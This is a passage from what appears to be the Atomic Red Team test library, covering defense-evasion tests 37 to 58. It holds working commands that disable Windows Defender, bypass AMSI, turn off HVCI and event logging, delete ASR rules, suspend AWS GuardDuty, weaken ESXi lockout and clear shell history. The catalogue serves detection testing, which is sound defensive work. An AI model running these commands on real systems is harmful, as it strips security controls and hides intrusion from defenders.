reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1

Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell

LockBit Black - Disable Privacy Settings Experience Using Registry

Supported Platforms: Windows

auto_generated_guid: d8c57eaa-497a-4a08-961e-bd5efd7c9374

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force

Cleanup Commands

Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore

Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell

Lockbit Black - Use Registry Editor to turn on automatic logon

Supported Platforms: Windows

auto_generated_guid: 5e27f36d-5132-4537-b43b-413b0d5eec9a

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force

Cleanup Commands

Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore

Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature

The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images. A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed. This method will remove Defender and it's packages. Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps

Supported Platforms: Windows

auto_generated_guid: f542ffd3-37b4-4528-837f-682874faa012

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore

Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder

The following Atomic will attempt to exclude a folder within Defender leveraging WMI Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

Supported Platforms: Windows

auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"

Cleanup Commands

wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"

Atomic Test #41: Delete Windows Defender Scheduled Tasks

The following atomic test will delete the Windows Defender scheduled tasks.

Reference

Supported Platforms: Windows

auto_generated_guid: 4b841aa1-0d05-4b32-bbe7-7564346e7c76

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )

Cleanup Commands

schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f

Dependencies: Run with command_prompt!

Description: The Windows Defender scheduled tasks must be backed up first
Check Prereq Commands
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )
Get Prereq Commands
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"

Atomic Test #42: Clear History

Clear Shell History. This technique only affect the bash shell application.

Supported Platforms: Linux

auto_generated_guid: 23b88394-091b-4968-a42d-fb8076992443

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

history -c

Atomic Test #43: Suspend History

suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell

Supported Platforms: Linux

auto_generated_guid: 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

set +o history

Cleanup Commands

set -o history

Atomic Test #44: Reboot Linux Host via Kernel System Request

reboot system via system request seen in Awfulshred wiper.

Supported Platforms: Linux

auto_generated_guid: 6d6d3154-1a52-4d1a-9d51-92ab8148b32e

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

echo 1> /proc/sys/kernel/sysrq
echo b> /proc/sysrq-trigger

Atomic Test #45: Clear Pagging Cache

clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/

Supported Platforms: Linux

auto_generated_guid: f790927b-ea85-4a16-b7b2-7eb44176a510

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches

Atomic Test #46: Disable Memory Swap

disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.

Supported Platforms: Linux

auto_generated_guid: e74e4c63-6fde-4ad2-9ee8-21c3a1733114

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

swapon -a
sleep 2
swapoff -a
sync

Cleanup Commands

swapon -a
sleep 2
sync

Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)

This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0". The pre-req needs to be ran in order to setup HVCI and have it enabled. We do not recommend running this in production. Black Lotus Campaign Microsoft

Supported Platforms: Windows

auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f

Cleanup Commands

reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f

Dependencies: Run with powershell!

Description: HVCI must be enabled
Check Prereq Commands
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
Get Prereq Commands
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f

Atomic Test #48: AMSI Bypass - Override AMSI via COM

With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist. This is currently being used by AsyncRAT and others. https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/

Supported Platforms: Windows

auto_generated_guid: 17538258-5699-4ff1-92d1-5ac9b0dc21f5

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f

Cleanup Commands

REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f

Atomic Test #49: AWS - GuardDuty Suspension or Deletion

Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.

Supported Platforms: Iaas:aws

auto_generated_guid: 11e65d8d-e7e4-470e-a3ff-82bc56ad938e

Inputs

NameDescriptionTypeDefault Value
regionName of the specified regionstringus-east-1

Attack Commands: Run with bash!

detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId

Cleanup Commands

echo "If test successfully ran, no cleanup required."

Dependencies: Run with bash!

Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands
cat ~/.aws/credentials | grep "default"
Get Prereq Commands
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"

Atomic Test #50: Tamper with Defender ATP on Linux/MacOS

With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide

Supported Platforms: Linux, macOS

auto_generated_guid: 40074085-dbc8-492b-90a3-11bcfc52fda8

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

sudo mdatp config real-time-protection --value disabled

Cleanup Commands

sudo mdatp config real-time-protection --value enabled

Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe

Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"

Supported Platforms: Windows

auto_generated_guid: 1f6743da-6ecc-4a93-b03f-dc357e4b313f

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul

Cleanup Commands

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul

Atomic Test #52: Tamper with Windows Defender Registry - Powershell

Disable Windows Defender by tampering with windows defender registry through powershell

Supported Platforms: Windows

auto_generated_guid: a72cfef8-d252-48b3-b292-635d332625c3

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 0
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0

Cleanup Commands

Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 1
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1

Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI

An adversary may disable account lockout policy within ESXi to have the ability to prevent defensive actions from being enforced in the future or to prevent future alerting.

Supported Platforms: Linux

auto_generated_guid: 091a6290-cd29-41cb-81ea-b12f133c66cb

Inputs

NameDescriptionTypeDefault Value
vm_hostSpecify the host name of the ESXi Serverstringatomic.local
vm_userSpecify the privilege user account on ESXi Serverstringroot
vm_passSpecify the privilege user password on ESXi Serverstringpass

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-AdvancedSetting -Entity #{vm_host} -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false
Disconnect-VIServer -Confirm:$false

Dependencies: Run with powershell!

Description: Check if VMWARE PowerCLI PowerShell Module is installed.
Check Prereq Commands
$RequiredModule = Get-Module -Name VMware.PowerCLI -ListAvailable
if (-not $RequiredModule) {exit 1}
Get Prereq Commands
Install-Module -Name VMware.PowerCLI -Confirm:$false

Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune

This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.

Supported Platforms: Windows

auto_generated_guid: eea0a6c2-84e9-4e8c-a242-ac585d28d0d1

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager"

if (-not (Test-Path $registryPath)) {
  New-Item -Path $registryPath -Force
  Write-Host "Registry key created: $registryPath"
}

$registryValueName = "ASRRules"

if (Test-Path "$registryPath\$registryValueName") {
  Remove-ItemProperty -Path $registryPath -Name $registryValueName
  Write-Host "Registry value deleted: $registryValueName"
} else {
  New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value "36190899-1602-49e8-8b27-eb1d0a1ce869=1" -Force
  Write-Host "Registry value created: $registryValueName"
}


Remove-ItemProperty -Path $registryPath -Name $registryValueName
Write-Host "Registry value deleted: $registryValueName"

Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO

This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.

Supported Platforms: Windows

auto_generated_guid: 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

$registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules"

if (-not (Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force
    Write-Host "Registry key created: $registryPath"
}

$newValueName = "36190899-1602-49e8-8b27-eb1d0a1ce869"
$newValueData = "1"
New-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force
Write-Host "Registry value created: $newValueName with data $newValueData"

Remove-ItemProperty -Path $registryPath -Name $newValueName
Write-Host "Registry value deleted: $newValueName"

Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key

Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable” and set its value to 0. Ref: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d

Supported Platforms: Windows

auto_generated_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Name "AmsiEnable" -Value 0 -PropertyType DWORD -Force | Out-Null

Cleanup Commands

Remove-Item -Path "HKCU:\Software\Microsoft\Windows Script\Settings" -Recurse -Force 2> $null

Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd

This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the reg.exe utility to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.

Supported Platforms: Windows

auto_generated_guid: 653c6e17-14a2-4849-851d-f1c0cc8ea9ab

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "0" /f

Cleanup Commands

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application" /v "Start" /t REG_DWORD /d "1" /f

Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell

This atomic simulates an activity where an attacker disables the EventLog-Application ETW Auto Logger session using the powershell.exe "New-ItemProperty" cmdlet to update the Windows registry value "Start". This would effectivly disable the Event log application channel. The changes would only take effect after a restart.

Supported Platforms: Windows

auto_generated_guid: da86f239-9bd3-4e85-92ed-4a94ef111a1c

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

New-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application -Name Start -Value 0 -PropertyType "DWord" -Force

Cleanup Commands

